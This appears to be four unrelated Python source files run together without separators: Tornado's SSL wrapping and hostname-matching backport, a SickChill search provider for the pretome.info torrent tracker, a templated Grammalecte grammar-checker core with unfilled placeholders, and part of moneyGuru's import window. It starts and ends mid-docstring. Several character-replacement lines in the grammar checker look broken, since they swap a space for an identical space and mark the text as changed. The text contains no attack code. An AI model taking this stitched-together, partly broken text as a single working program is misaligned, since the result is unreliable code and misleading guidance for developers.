    `~ssl.SSLContext` method or the `ssl` module function, whichever
    applies).
    """
    context = ssl_options_to_context(ssl_options)
    if not (hasattr(ssl, 'SSLContext') and isinstance(context, ssl.SSLContext)):
        # Pre-SSLContext path: ``context`` is still the options dict.
        return ssl.wrap_socket(socket, **dict(context, **kwargs))
    if server_hostname is not None and getattr(ssl, 'HAS_SNI'):
        # Python doesn't have server-side SNI support so we can't
        # really unittest this, but it can be manually tested with
        # python3.2 -m tornado.httpclient https://sni.velox.ch
        return context.wrap_socket(socket, server_hostname=server_hostname,
                                   **kwargs)
    return context.wrap_socket(socket, **kwargs)

if hasattr(ssl, 'match_hostname'):  # python 3.2+
    ssl_match_hostname = ssl.match_hostname
    SSLCertificateError = ssl.CertificateError
else:
    # Backport of ssl.match_hostname for pre-3.2 interpreters, copied from
    # https://bitbucket.org/brandon/backports.ssl_match_hostname
    class SSLCertificateError(ValueError):
        pass

    def _dnsname_to_pat(dn):
        fragments = []
        for piece in dn.split(r'.'):
            if piece == '*':
                # A lone '*' fragment matches exactly one non-empty label.
                fragments.append('[^.]+')
            else:
                # An embedded '*' matches any dotless run within the label.
                fragments.append(re.escape(piece).replace(r'\*', '[^.]*'))
        return re.compile(r'\A' + r'\.'.join(fragments) + r'\Z', re.IGNORECASE)

    def ssl_match_hostname(cert, hostname):
        """Verify that *cert* (in decoded format as returned by
        SSLSocket.getpeercert()) matches the *hostname*.  RFC 2818 rules
        are mostly followed, but IP addresses are not accepted for
        *hostname*.

        CertificateError is raised on failure; on success the function
        returns nothing.
        """
        if not cert:
            raise ValueError("empty or no certificate")
        tried = []
        san = cert.get('subjectAltName', ())
        for kind, value in san:
            if kind == 'DNS':
                if _dnsname_to_pat(value).match(hostname):
                    return
                tried.append(value)
        if not san:
            # The subject is only checked when subjectAltName is empty.
            for sub in cert.get('subject', ()):
                for kind, value in sub:
                    # XXX according to RFC 2818, the most specific Common
                    # Name must be used.
                    if kind == 'commonName':
                        if _dnsname_to_pat(value).match(hostname):
                            return
                        tried.append(value)
        if len(tried) > 1:
            raise SSLCertificateError(
                "hostname %r doesn't match either of %s"
                % (hostname, ', '.join(map(repr, tried))))
        if len(tried) == 1:
            raise SSLCertificateError(
                "hostname %r doesn't match %r" % (hostname, tried[0]))
        raise SSLCertificateError(
            "no appropriate commonName or subjectAltName fields were found")

import re
import traceback
from urllib.parse import quote

from requests.utils import dict_from_cookiejar

from sickchill import logger
from sickchill.helper.common import convert_size, try_int
from sickchill.oldbeard import tvcache
from sickchill.oldbeard.bs4_parser import BS4Parser
from sickchill.providers.torrent.TorrentProvider import TorrentProvider


class Provider(TorrentProvider):
    """Search provider for the private torrent tracker pretome.info."""

    def __init__(self):

        super().__init__("Pretome")

        # Credentials, filled in from the user's provider settings.
        self.username = None
        self.password = None
        self.pin = None
        # Minimum peer counts; results below these thresholds are discarded.
        self.minseed = 0
        self.minleech = 0

        self.urls = {
            "base_url": "https://pretome.info",
            "login": "https://pretome.info/takelogin.php",
            "detail": "https://pretome.info/details.php?id=%s",
            "search": "https://pretome.info/browse.php?search=%s%s",
            "download": "https://pretome.info/download.php/%s/%s.torrent",
        }

        self.url = self.urls["base_url"]

        # Static category filter appended to every search URL.
        self.categories = "&st=1&cat%5B%5D=7"

        self.proper_strings = ["PROPER", "REPACK"]

        self.cache = tvcache.TVCache(self)

    def _check_auth(self):
        """Warn (but do not fail) when any credential is missing."""
        if not self.username or not self.password or not self.pin:
            logger.warning("Invalid username or password or pin. Check your settings")

        return True

    def login(self):
        """Log in to the tracker; returns True once a session exists."""
        # An existing session cookie means we are already logged in.
        if any(dict_from_cookiejar(self.session.cookies).values()):
            return True

        login_params = {"username": self.username, "password": self.password, "login_pin": self.pin}

        response = self.get_url(self.urls["login"], post_data=login_params, returns="text")
        if not response:
            logger.warning("Unable to connect to provider")
            return False

        if re.search("Username or password incorrect", response):
            logger.warning("Invalid username or password. Check your settings")
            return False

        return True

    def search(self, search_params, age=0, ep_obj=None):
        """Search the tracker.

        ``search_params`` maps a mode ("RSS", "Episode", ...) to a list of
        search strings.  Returns a list of result dicts (keys: title,
        link, size, seeders, leechers, hash), sorted by seeders.
        """
        results = []
        if not self.login():
            return results

        for mode in search_params:
            items = []
            logger.debug(_("Search Mode: {mode}".format(mode=mode)))
            for search_string in search_params[mode]:

                if mode != "RSS":
                    logger.debug(_("Search String: {search_string}".format(search_string=search_string)))

                search_url = self.urls["search"] % (quote(search_string), self.categories)

                data = self.get_url(search_url, returns="text")
                if not data:
                    continue

                try:
                    with BS4Parser(data, "html5lib") as html:
                        # Continue only if one Release is found
                        empty = html.find("h2", text="No .torrents fit this filter criteria")
                        if empty:
                            logger.debug("Data returned from provider does not contain any torrents")
                            continue

                        torrent_table = html.find("table", style="border: none; width: 100%;")
                        if not torrent_table:
                            logger.exception("Could not find table of torrents")
                            continue

                        torrent_rows = torrent_table("tr", class_="browse")

                        for result in torrent_rows:
                            cells = result("td")

                            try:
                                # BUGFIX: all per-row parsing happens inside this
                                # try block.  Previously the link lookup and
                                # torrent_id extraction ran before it, so a single
                                # malformed row raised outside the handler and
                                # aborted parsing of the entire page.
                                link = cells[1].find("a", style="font-size: 1.25em; font-weight: bold;")
                                torrent_id = link["href"].replace("details.php?id=", "")

                                if link.get("title", ""):
                                    title = link["title"]
                                else:
                                    title = link.contents[0]

                                download_url = self.urls["download"] % (torrent_id, link.contents[0])
                                seeders = int(cells[9].contents[0])
                                leechers = int(cells[10].contents[0])

                                # Need size for failed downloads handling
                                torrent_size = cells[7].text
                                size = convert_size(torrent_size) or -1

                            except (AttributeError, IndexError, KeyError, TypeError):
                                # Malformed row: skip it, keep parsing the rest.
                                continue

                            if not all([title, download_url]):
                                continue

                            # Filter unseeded torrent
                            if seeders < self.minseed or leechers < self.minleech:
                                if mode != "RSS":
                                    logger.debug(
                                        "Discarding torrent because it doesn't meet the minimum seeders or leechers: {0} (S:{1} L:{2})".format(
                                            title, seeders, leechers
                                        )
                                    )
                                continue

                            item = {"title": title, "link": download_url, "size": size, "seeders": seeders, "leechers": leechers, "hash": ""}
                            if mode != "RSS":
                                logger.debug("Found result: {0} with {1} seeders and {2} leechers".format(title, seeders, leechers))

                            items.append(item)

                except Exception:
                    logger.exception("Failed parsing provider. Traceback: {0}".format(traceback.format_exc()))

            # For each search mode sort all the items by seeders if available
            items.sort(key=lambda d: try_int(d.get("seeders", 0)), reverse=True)

            results += items

        return results

# -*- encoding: UTF-8 -*-

import re
import sys
import os
import traceback

from ..ibdawg import IBDAWG
from ..echo import echo
from . import gc_options


# Public API of this generated grammar-checker module.
__all__ = [ "lang", "locales", "pkg", "name", "version", "author", \
            "load", "parse", "getDictionary", \
            "setOptions", "getOptions", "getOptionsLabels", "resetOptions", \
            "ignoreRule", "resetIgnoreRules" ]

__version__ = u"${version}"


# Package metadata; the ${...} placeholders are filled in at build time.
lang = u"${lang}"
locales = ${loc}
pkg = u"${implname}"
name = u"${name}"
version = u"${version}"
author = u"${author}"

# commons regexes
# end of sentence: a terminator optionally followed by quotes/spaces,
# or the last character of the paragraph
_zEndOfSentence = re.compile(u'([.?!:;…][ .?!… »”")]*|.$)')
_zBeginOfParagraph = re.compile(u"^\W*")
_zEndOfParagraph = re.compile(u"\W*$")
# a word following spaces / a word preceding trailing spaces
_zNextWord = re.compile(u" +(\w[\w-]*)")
_zPrevWord = re.compile(u"(\w[\w-]*) +$")

# grammar rules and dictionary
_rules = None                           # rules module, set lazily by _loadRules()
_dOptions = dict(gc_options.dOpt)       # duplication necessary, to be able to reset to default
_aIgnoredRules = set()                  # rule ids disabled via ignoreRule()
_oDict = None                           # IBDAWG dictionary, set by load()
_dAnalyses = {}                         # cache for data from dictionary

# module namespace, used to look up generated condition/action functions by name
_GLOBALS = globals()


#### Parsing

def parse (sText, sCountry="${country_default}", bDebug=False, dOptions=None):
    "analyses the paragraph sText and returns list of errors"
    # dOptions, when given, overrides the module-level options for this
    # call only; sCountry selects country-specific rules.
    sAlt = sText                    # unmodified copy, kept for error reporting
    dDA = {}                        # disambiguation data, reset for each sentence
    dOpt = _dOptions  if not dOptions  else dOptions

    # paragraph-level pass; _proofread may rewrite the text for the
    # sentence-level passes.  (The former "try: ... except: raise"
    # wrappers were no-ops — a bare re-raise propagates the exception
    # unchanged — so they have been removed.)
    sNew, aErrors = _proofread(sText, sAlt, 0, True, dDA, sCountry, dOpt, bDebug)
    if sNew:
        sText = sNew

    # sentence-level passes; very short or very long sentences are skipped
    for iStart, iEnd in _getSentenceBoundaries(sText):
        if 4 < (iEnd - iStart) < 2000:
            dDA.clear()
            _, errs = _proofread(sText[iStart:iEnd], sAlt[iStart:iEnd], iStart, False, dDA, sCountry, dOpt, bDebug)
            aErrors.extend(errs)
    return aErrors


def _getSentenceBoundaries (sText):
    "yield (start, end) index pairs, one per sentence of sText"
    iBegin = _zBeginOfParagraph.match(sText).end()
    for m in _zEndOfSentence.finditer(sText):
        yield (iBegin, m.end())
        iBegin = m.end()


def _proofread (s, sx, nOffset, bParagraph, dDA, sCountry, dOptions, bDebug):
    "run the (paragraph or sentence) rules on s; returns (rewritten text or False, errors)"
    # s:          working text, possibly rewritten by "~" (text processor) actions
    # sx:         original text, passed to condition functions and error builders
    # nOffset:    position of s within the whole paragraph
    # bParagraph: True on the paragraph pass, False on sentence passes
    # dDA:        disambiguation data, filled by "=" actions
    aErrs = []
    bChange = False

    if not bParagraph:
        # after the first pass, we modify automatically some characters
        if u" " in s:
            s = s.replace(u" ", u' ') # nbsp
            bChange = True
        if u" " in s:
            s = s.replace(u" ", u' ') # nnbsp
            bChange = True
        if u"@" in s:
            s = s.replace(u"@", u' ')
            bChange = True
        if u"'" in s:
            s = s.replace(u"'", u"’")
            bChange = True
        if u"‑" in s:
            s = s.replace(u"‑", u"-") # nobreakdash
            bChange = True

    # whether rule ids are appended to error messages
    bIdRule = option('idrule')

    for sOption, lRuleGroup in _getRules(bParagraph):
        # a rule group runs when it has no option or its option is enabled
        if not sOption or dOptions.get(sOption, False):
            for zRegex, bUppercase, sRuleId, lActions in lRuleGroup:
                if sRuleId not in _aIgnoredRules:
                    for m in zRegex.finditer(s):
                        for sFuncCond, cActionType, sWhat, *eAct in lActions:
                            # action in lActions: [ condition, action type, replacement/suggestion/action[, iGroup[, message, URL]] ]
                            # sFuncCond names a generated condition function in _GLOBALS
                            try:
                                if not sFuncCond or _GLOBALS[sFuncCond](s, sx, m, dDA, sCountry):
                                    if cActionType == "-":
                                        # grammar error
                                        # (text, replacement, nOffset, m, iGroup, sId, bUppercase, sURL, bIdRule)
                                        aErrs.append(_createError(s, sWhat, nOffset, m, eAct[0], sRuleId, bUppercase, eAct[1], eAct[2], bIdRule, sOption))
                                    elif cActionType == "~":
                                        # text processor
                                        s = _rewrite(s, sWhat, eAct[0], m, bUppercase)
                                        bChange = True
                                        if bDebug:
                                            echo(u"~ " + s + "  -- " + m.group(eAct[0]) + "  # " + sRuleId)
                                    elif cActionType == "=":
                                        # disambiguation
                                        _GLOBALS[sWhat](s, m, dDA)
                                        if bDebug:
                                            echo(u"= " + m.group(0) + "  # " + sRuleId + "\nDA: " + str(dDA))
                                    else:
                                        echo("# error: unknown action at " + sRuleId)
                            except Exception as e:
                                # tag the failing rule id onto the exception
                                raise Exception(str(e), sRuleId)
    if bChange:
        return (s, aErrs)
    return (False, aErrs)


def _createWriterError (s, sRepl, nOffset, m, iGroup, sId, bUppercase, sMsg, sURL, bIdRule, sOption):
    "error for Writer (LO/OO)"
    # Builds a com.sun.star.linguistic2.SingleProofreadingError struct from a
    # regex match; mirrors _createDictError, which produces the same data as
    # a plain dict for standalone use.
    xErr = SingleProofreadingError()
    #xErr = uno.createUnoStruct( "com.sun.star.linguistic2.SingleProofreadingError" )
    xErr.nErrorStart        = nOffset + m.start(iGroup)
    xErr.nErrorLength       = m.end(iGroup) - m.start(iGroup)
    xErr.nErrorType         = PROOFREADING
    xErr.aRuleIdentifier    = sId
    # suggestions
    # "=name" calls the generated function `name`; "_" means no suggestion;
    # otherwise sRepl is a "|"-separated replacement template.
    if sRepl[0:1] == "=":
        sugg = _GLOBALS[sRepl[1:]](s, m)
        if sugg:
            if bUppercase and m.group(iGroup)[0:1].isupper():
                xErr.aSuggestions = tuple(map(str.capitalize, sugg.split("|")))
            else:
                xErr.aSuggestions = tuple(sugg.split("|"))
        else:
            xErr.aSuggestions = ()
    elif sRepl == "_":
        xErr.aSuggestions = ()
    else:
        if bUppercase and m.group(iGroup)[0:1].isupper():
            xErr.aSuggestions = tuple(map(str.capitalize, m.expand(sRepl).split("|")))
        else:
            xErr.aSuggestions = tuple(m.expand(sRepl).split("|"))
    # Message
    # "=name" likewise means a message computed by a generated function.
    if sMsg[0:1] == "=":
        sMessage = _GLOBALS[sMsg[1:]](s, m)
    else:
        sMessage = m.expand(sMsg)
    xErr.aShortComment      = sMessage   # sMessage.split("|")[0]     # in context menu
    xErr.aFullComment       = sMessage   # sMessage.split("|")[-1]    # in dialog
    if bIdRule:
        xErr.aShortComment += "  # " + sId
    # URL
    if sURL:
        p = PropertyValue()
        p.Name = "FullCommentURL"
        p.Value = sURL
        xErr.aProperties    = (p,)
    else:
        xErr.aProperties    = ()
    return xErr


def _createDictError (s, sRepl, nOffset, m, iGroup, sId, bUppercase, sMsg, sURL, bIdRule, sOption):
    "error as a dictionary"
    dErr = {}
    dErr["nStart"]          = nOffset + m.start(iGroup)
    dErr["nEnd"]            = nOffset + m.end(iGroup)
    dErr["sRuleId"]         = sId
    dErr["sType"]           = sOption  if sOption  else "notype"
    # suggestions
    if sRepl[0:1] == "=":
        sugg = _GLOBALS[sRepl[1:]](s, m)
        if sugg:
            if bUppercase and m.group(iGroup)[0:1].isupper():
                dErr["aSuggestions"] = list(map(str.capitalize, sugg.split("|")))
            else:
                dErr["aSuggestions"] = sugg.split("|")
        else:
            dErr["aSuggestions"] = ()
    elif sRepl == "_":
        dErr["aSuggestions"] = ()
    else:
        if bUppercase and m.group(iGroup)[0:1].isupper():
            dErr["aSuggestions"] = list(map(str.capitalize, m.expand(sRepl).split("|")))
        else:
            dErr["aSuggestions"] = m.expand(sRepl).split("|")
    # Message
    if sMsg[0:1] == "=":
        sMessage = _GLOBALS[sMsg[1:]](s, m)
    else:
        sMessage = m.expand(sMsg)
    dErr["sMessage"]      = sMessage
    if bIdRule:
        dErr["sMessage"] += "  # " + sId
    # URL
    dErr["URL"] = sURL  if sURL  else ""
    return dErr


def _rewrite (s, sRepl, iGroup, m, bUppercase):
    "text processor: write sRepl in s at iGroup position"
    ln = m.end(iGroup) - m.start(iGroup)
    if sRepl == "*":
        sNew = " " * ln
    elif sRepl == ">" or sRepl == "_" or sRepl == u"~":
        sNew = sRepl + " " * (ln-1)
    elif sRepl == "@":
        sNew = "@" * ln
    elif sRepl[0:1] == "=":
        if sRepl[1:2] != "@":
            sNew = _GLOBALS[sRepl[1:]](s, m)
            sNew = sNew + " " * (ln-len(sNew))
        else:
            sNew = _GLOBALS[sRepl[2:]](s, m)
            sNew = sNew + "@" * (ln-len(sNew))
        if bUppercase and m.group(iGroup)[0:1].isupper():
            sNew = sNew.capitalize()
    else:
        sNew = m.expand(sRepl)
        sNew = sNew + " " * (ln-len(sNew))
    return s[0:m.start(iGroup)] + sNew + s[m.end(iGroup):]


def ignoreRule (sId):
    "disable rule sId for subsequent parses (until resetIgnoreRules is called)"
    _aIgnoredRules.add(sId)


def resetIgnoreRules ():
    "re-enable all rules disabled with ignoreRule()"
    _aIgnoredRules.clear()


#### init

try:
    # LibreOffice / OpenOffice
    # When the UNO API is importable we are running inside Writer: report
    # errors as SingleProofreadingError structs.
    from com.sun.star.linguistic2 import SingleProofreadingError
    from com.sun.star.text.TextMarkupType import PROOFREADING
    from com.sun.star.beans import PropertyValue
    #import lightproof_handler_${implname} as opt
    _createError = _createWriterError
except ImportError:
    # Standalone use: report errors as plain dictionaries.
    _createError = _createDictError


def load ():
    "load the binary dictionary; on failure _oDict stays None and the error is printed"
    global _oDict
    try:
        _oDict = IBDAWG("${binary_dic}")
    except Exception:
        # was a bare "except:", which would also swallow SystemExit and
        # KeyboardInterrupt; keep the best-effort behaviour but let those
        # propagate
        traceback.print_exc()


def setOptions (dOpt):
    "merge dOpt into the active grammar-checker options"
    _dOptions.update(dOpt)


def getOptions ():
    "return the active options dict (the live object, not a copy)"
    return _dOptions


def getOptionsLabels (sLang):
    "return the UI labels of the options for language sLang"
    return gc_options.getUI(sLang)


def resetOptions ():
    "restore the default options"
    global _dOptions
    _dOptions = dict(gc_options.dOpt)


def getDictionary ():
    "return the IBDAWG dictionary set by load() (None if not loaded)"
    return _oDict


def _getRules (bParagraph):
    "return the sentence-level or paragraph-level rules, loading them on first use"
    try:
        if not bParagraph:
            return _rules.lSentenceRules
        return _rules.lParagraphRules
    except AttributeError:
        # _rules is still None: the rules have not been loaded yet.
        # (was a bare "except:", which could also hide unrelated errors)
        _loadRules()
    if not bParagraph:
        return _rules.lSentenceRules
    return _rules.lParagraphRules


def _loadRules2 ():
    "import and precompile the grammar rules (flat rule-list variant)"
    from itertools import chain
    from . import gc_rules
    global _rules
    _rules = gc_rules
    # precompile each rule's regex in place; a broken pattern is replaced
    # by one that cannot match ordinary text
    for lRule in chain(_rules.lParagraphRules, _rules.lSentenceRules):
        try:
            lRule[1] = re.compile(lRule[1])
        except:
            echo("Bad regular expression in # " + str(lRule[3]))
            lRule[1] = "(?i)<Grammalecte>"


def _loadRules ():
    "import and precompile the grammar rules (grouped rule-list variant)"
    from itertools import chain
    from . import gc_rules
    global _rules
    _rules = gc_rules
    # precompile each rule's regex in place; a broken pattern is replaced
    # by one that cannot match ordinary text
    for lRuleGroup in chain(_rules.lParagraphRules, _rules.lSentenceRules):
        for lRule in lRuleGroup[1]:
            try:
                lRule[0] = re.compile(lRule[0])
            except:
                echo("Bad regular expression in # " + str(lRule[2]))
                lRule[0] = "(?i)<Grammalecte>"


def _getPath ():
    return os.path.join(os.path.dirname(sys.modules[__name__].__file__), __name__ + ".py")



#### common functions

def option (sOpt):
    "return True if option sOpt is active (False for unknown options)"
    return _dOptions.get(sOpt, False)


def displayInfo (dDA, tWord):
    "for debugging: retrieve info of word"
    # tWord is a (position, word) tuple; dDA maps positions to disambiguated
    # morphology lists.  Always returns True so it can be used as a rule
    # condition without changing the outcome.
    if not tWord:
        echo("> nothing to find")
        return True
    if tWord[1] not in _dAnalyses and not _storeMorphFromFSA(tWord[1]):
        echo("> not in FSA")
        return True
    if tWord[0] in dDA:
        echo("DA: " + str(dDA[tWord[0]]))
    echo("FSA: " + str(_dAnalyses[tWord[1]]))
    return True


def _storeMorphFromFSA (sWord):
    "retrieves morphologies list from _oDict -> _dAnalyses"
    # cache the dictionary lookup and report whether anything was found
    _dAnalyses[sWord] = _oDict.getMorph(sWord)
    return bool(_dAnalyses[sWord])


def morph (dDA, tWord, sPattern, bStrict=True, bNoWord=False):
    "analyse a tuple (position, word), return True if sPattern in morphologies (disambiguation on)"
    if not tWord:
        return bNoWord
    if tWord[1] not in _dAnalyses and not _storeMorphFromFSA(tWord[1]):
        return False
    # disambiguated morphologies take precedence over the raw cache
    lMorph = dDA.get(tWord[0], _dAnalyses[tWord[1]])
    if not lMorph:
        return False
    zPat = re.compile(sPattern)
    fnCheck = all if bStrict else any
    return fnCheck(zPat.search(sMorph) for sMorph in lMorph)


def morphex (dDA, tWord, sPattern, sNegPattern, bNoWord=False):
    "analyse a tuple (position, word), returns True if not sNegPattern in word morphologies and sPattern in word morphologies (disambiguation on)"
    if not tWord:
        return bNoWord
    if tWord[1] not in _dAnalyses and not _storeMorphFromFSA(tWord[1]):
        return False
    lMorph = dDA.get(tWord[0], _dAnalyses[tWord[1]])
    # negative condition first: any match disqualifies the word
    zNeg = re.compile(sNegPattern)
    if any(zNeg.search(sMorph) for sMorph in lMorph):
        return False
    # then search for the positive pattern
    zPat = re.compile(sPattern)
    return any(zPat.search(sMorph) for sMorph in lMorph)


def analyse (sWord, sPattern, bStrict=True):
    "analyse a word, return True if sPattern in morphologies (disambiguation off)"
    if sWord not in _dAnalyses and not _storeMorphFromFSA(sWord):
        return False
    lMorph = _dAnalyses[sWord]
    if not lMorph:
        return False
    zPat = re.compile(sPattern)
    fnCheck = all if bStrict else any
    return fnCheck(zPat.search(sMorph) for sMorph in lMorph)


def analysex (sWord, sPattern, sNegPattern):
    "analyse a word, returns True if not sNegPattern in word morphologies and sPattern in word morphologies (disambiguation off)"
    if sWord not in _dAnalyses and not _storeMorphFromFSA(sWord):
        return False
    lMorph = _dAnalyses[sWord]
    # negative condition first: any match disqualifies the word
    zNeg = re.compile(sNegPattern)
    if any(zNeg.search(sMorph) for sMorph in lMorph):
        return False
    # then search for the positive pattern
    zPat = re.compile(sPattern)
    return any(zPat.search(sMorph) for sMorph in lMorph)


def stem (sWord):
    "returns a list of sWord's stems"
    if not sWord:
        return []
    if sWord not in _dAnalyses and not _storeMorphFromFSA(sWord):
        return []
    # each morphology string starts with ">stem " — keep the stem part only
    return [ sMorph[1:sMorph.find(" ")]  for sMorph in _dAnalyses[sWord] ]


## functions to get text outside pattern scope

# warning: check compile_rules.py to understand how it works

def nextword (s, iStart, n):
    "get the nth word after position iStart, as a (position, word) tuple, or None"
    m = re.match(u"( +[\\w%-]+){" + str(n-1) + u"} +([\\w%-]+)", s[iStart:])
    return (iStart + m.start(2), m.group(2)) if m else None


def prevword (s, iEnd, n):
    "get the nth word before position iEnd, as a (position, word) tuple, or None"
    m = re.search(u"([\\w%-]+) +([\\w%-]+ +){" + str(n-1) + u"}$", s[:iEnd])
    return (m.start(1), m.group(1)) if m else None


def nextword1 (s, iStart):
    "get the word immediately following position iStart (optimization)"
    m = _zNextWord.match(s[iStart:])
    return (iStart + m.start(1), m.group(1)) if m else None


def prevword1 (s, iEnd):
    "get the word immediately preceding position iEnd (optimization)"
    m = _zPrevWord.search(s[:iEnd])
    return (m.start(1), m.group(1)) if m else None


def look (s, sPattern, sNegPattern=None):
    "seek sPattern in s (before/after/fulltext), if sNegPattern not in s"
    if sNegPattern and re.search(sNegPattern, s):
        return False
    return bool(re.search(sPattern, s))


def look_chk1 (dDA, s, nOffset, sPattern, sPatternGroup1, sNegPatternGroup1=None):
    "returns True if s has pattern sPattern and m.group(1) has pattern sPatternGroup1"
    m = re.search(sPattern, s)
    if not m:
        return False
    try:
        tWord = (m.start(1) + nOffset, m.group(1))
    except:
        # sPattern has no group 1
        return False
    if sNegPatternGroup1:
        return morphex(dDA, tWord, sPatternGroup1, sNegPatternGroup1)
    return morph(dDA, tWord, sPatternGroup1, False)


#### Disambiguator

def select (dDA, nPos, sWord, sPattern, lDefault=None):
    "disambiguation: keep only the morphologies of sWord matching sPattern (or lDefault) in dDA at nPos; always returns True"
    if not sWord or nPos in dDA:
        return True
    if sWord not in _dAnalyses and not _storeMorphFromFSA(sWord):
        return True
    lMorph = _dAnalyses[sWord]
    if len(lMorph) == 1:
        # nothing to disambiguate
        return True
    lSelect = [ sMorph  for sMorph in lMorph  if re.search(sPattern, sMorph) ]
    if lSelect:
        # record only when the selection actually narrows the set
        if len(lSelect) != len(lMorph):
            dDA[nPos] = lSelect
    elif lDefault:
        dDA[nPos] = lDefault
    return True


def exclude (dDA, nPos, sWord, sPattern, lDefault=None):
    "disambiguation: remove the morphologies of sWord matching sPattern (falling back to lDefault) in dDA at nPos; always returns True"
    if not sWord or nPos in dDA:
        return True
    if sWord not in _dAnalyses and not _storeMorphFromFSA(sWord):
        return True
    lMorph = _dAnalyses[sWord]
    if len(lMorph) == 1:
        # nothing to disambiguate
        return True
    lSelect = [ sMorph  for sMorph in lMorph  if not re.search(sPattern, sMorph) ]
    if lSelect:
        # record only when the exclusion actually narrows the set
        if len(lSelect) != len(lMorph):
            dDA[nPos] = lSelect
    elif lDefault:
        dDA[nPos] = lDefault
    return True


def define (dDA, nPos, lMorph):
    "disambiguation: set lMorph as the morphologies at position nPos; always returns True"
    dDA[nPos] = lMorph
    return True


#### GRAMMAR CHECKER PLUGINS

${plugins}


${generated}

# Copyright 2019 Virgil Dupras
#
# This software is licensed under the "GPLv3" License as described in the "LICENSE" file,
# which should be included with this package. The terms are also available at
# http://www.gnu.org/licenses/gpl-3.0.html

import datetime
from collections import defaultdict

from core.util import dedupe, first as getfirst
from core.trans import tr

from ..model.date import DateFormat
from .base import GUIObject
from .import_table import ImportTable
from .selectable_list import LinkedSelectableList

# Date-element identifiers used by the swap helpers below.
DAY = 'day'
MONTH = 'month'
YEAR = 'year'

class SwapType:
    """Identifiers for the swap operations offered on import panes."""
    DayMonth = 0
    MonthYear = 1
    DayYear = 2
    DescriptionPayee = 3
    InvertAmount = 4

def last_two_digits(year):
    """Return the last two decimal digits of ``year`` (i.e. ``year % 100``)."""
    # Python guarantees a - (a // b) * b == a % b, so this is the same
    # computation as the explicit subtraction form.
    return year % 100

def swapped_date(date, first, second):
    """Return ``date`` with its ``first`` and ``second`` elements exchanged.

    ``first`` and ``second`` are DAY, MONTH or YEAR.  Years are treated as
    two-digit values and re-anchored in the 2000s after the swap.
    """
    current = {DAY: date.day, MONTH: date.month, YEAR: last_two_digits(date.year)}
    replacements = {first: current[second], second: current[first]}
    if YEAR in replacements:
        # two-digit year -> full year in the 2000s
        replacements[YEAR] += 2000
    return date.replace(**replacements)

def swap_format_elements(format, first, second):
    """Return a copy of ``format`` (a DateFormat) with the ``first`` and
    ``second`` date elements swapped in its element list."""
    swapped = format.copy()
    elems = swapped.elements
    type2char = {DAY: 'd', MONTH: 'M', YEAR: 'y'}
    # locate each element by the character its format code starts with
    idx_first = [i for i, e in enumerate(elems) if e.startswith(type2char[first])][0]
    idx_second = [i for i, e in enumerate(elems) if e.startswith(type2char[second])][0]
    elems[idx_first], elems[idx_second] = elems[idx_second], elems[idx_first]
    return swapped

class AccountPane:
    """Import state for one account: its imported entries, the match pairs
    against an existing target account, and which date-field swaps are valid.

    ``matches`` is a list of ``[existing_entry, imported_entry]`` pairs; one
    side is ``None`` while the entry is unmatched.
    """
    def __init__(self, iwin, account, target_account, parsing_date_format):
        self.iwin = iwin
        self.account = account
        self._selected_target = target_account
        self.name = account.name
        entries = iwin.loader.accounts.entries_for_account(account)
        self.count = len(entries)
        self.matches = [] # [[ref, imported]]
        self.parsing_date_format = parsing_date_format
        self.max_day = 31
        self.max_month = 12
        self.max_year = 99 # 2 digits
        self._match_entries()
        self._swap_possibilities = set()
        self._compute_swap_possibilities()

    def _compute_swap_possibilities(self):
        # A swap pair is "possible" only if every imported entry's date is
        # still a valid date after the swap.
        entries = list(self.iwin.loader.accounts.entries_for_account(self.account))
        if not entries:
            return
        self._swap_possibilities = set([(DAY, MONTH), (MONTH, YEAR), (DAY, YEAR)])
        for first, second in self._swap_possibilities.copy():
            for entry in entries:
                try:
                    swapped_date(entry.date, first, second)
                except ValueError:
                    self._swap_possibilities.remove((first, second))
                    break

    def _match_entries(self):
        # Pair existing (document) entries with imported ones carrying the
        # same reference; anything left unpaired becomes a one-sided match.
        to_import = list(self.iwin.loader.accounts.entries_for_account(self.account))
        reference2entry = {}
        for entry in (e for e in to_import if e.reference):
            reference2entry[entry.reference] = entry
        self.matches = []
        if self.selected_target is not None:
            entries = self.iwin.document.accounts.entries_for_account(self.selected_target)
            for entry in entries:
                if entry.reference in reference2entry:
                    other = reference2entry[entry.reference]
                    if entry.reconciled:
                        # Already reconciled: exclude the duplicate by default.
                        self.iwin.import_table.dont_import.add(other)
                    to_import.remove(other)
                    del reference2entry[entry.reference]
                else:
                    other = None
                if other is not None or not entry.reconciled:
                    self.matches.append([entry, other])
        self.matches += [[None, entry] for entry in to_import]
        self._sort_matches()

    def _sort_matches(self):
        self.matches.sort(key=lambda t: t[0].date if t[0] is not None else t[1].date)

    def bind(self, existing, imported):
        """Merge the match rows of an unmatched existing entry and an
        unmatched imported entry into a single pair."""
        [match1] = [m for m in self.matches if m[0] is existing]
        [match2] = [m for m in self.matches if m[1] is imported]
        assert match1[1] is None
        assert match2[0] is None
        match1[1] = match2[1]
        self.matches.remove(match2)

    def can_swap_date_fields(self, first, second): # 'day', 'month', 'year'
        return (first, second) in self._swap_possibilities or (second, first) in self._swap_possibilities

    def match_entries_by_date_and_amount(self, threshold):
        """Auto-bind unmatched imported entries to unmatched existing entries
        with the same amount and a date within *threshold* days.
        """
        delta = datetime.timedelta(days=threshold)
        # Materialize both sides up front: bind() mutates self.matches, and
        # iterating lazy generators over it while binding would skip rows.
        unmatched = [
            to_import for ref, to_import in self.matches if ref is None]
        unmatched_refs = [
            ref for ref, to_import in self.matches if to_import is None]
        amount2refs = defaultdict(list)
        for entry in unmatched_refs:
            amount2refs[entry.amount].append(entry)
        for entry in unmatched:
            if entry.amount not in amount2refs:
                continue
            potentials = amount2refs[entry.amount]
            for ref in potentials:
                if abs(ref.date - entry.date) <= delta:
                    self.bind(ref, entry)
                    potentials.remove(ref)
                    # Each imported entry binds at most once; without this
                    # break a second candidate in range would trip bind()'s
                    # asserts (the imported entry is no longer unmatched).
                    break
        self._sort_matches()

    def unbind(self, existing, imported):
        """Split a bound pair back into two one-sided match rows."""
        [match] = [m for m in self.matches if m[0] is existing and m[1] is imported]
        match[1] = None
        self.matches.append([None, imported])
        self._sort_matches()

    @property
    def selected_target(self):
        return self._selected_target

    @selected_target.setter
    def selected_target(self, value):
        # Changing the target invalidates the current matching.
        self._selected_target = value
        self._match_entries()


# This is a modal window that is designed to be re-instantiated on each import
# run. It is shown modally by the UI as soon as its created on the UI side.
class ImportWindow(GUIObject):
    """Modal window driving an import run: one AccountPane per account found
    in the loader, plus tools to swap date fields / description-payee and to
    invert amounts before committing a pane into the document.

    This is a modal window that is designed to be re-instantiated on each
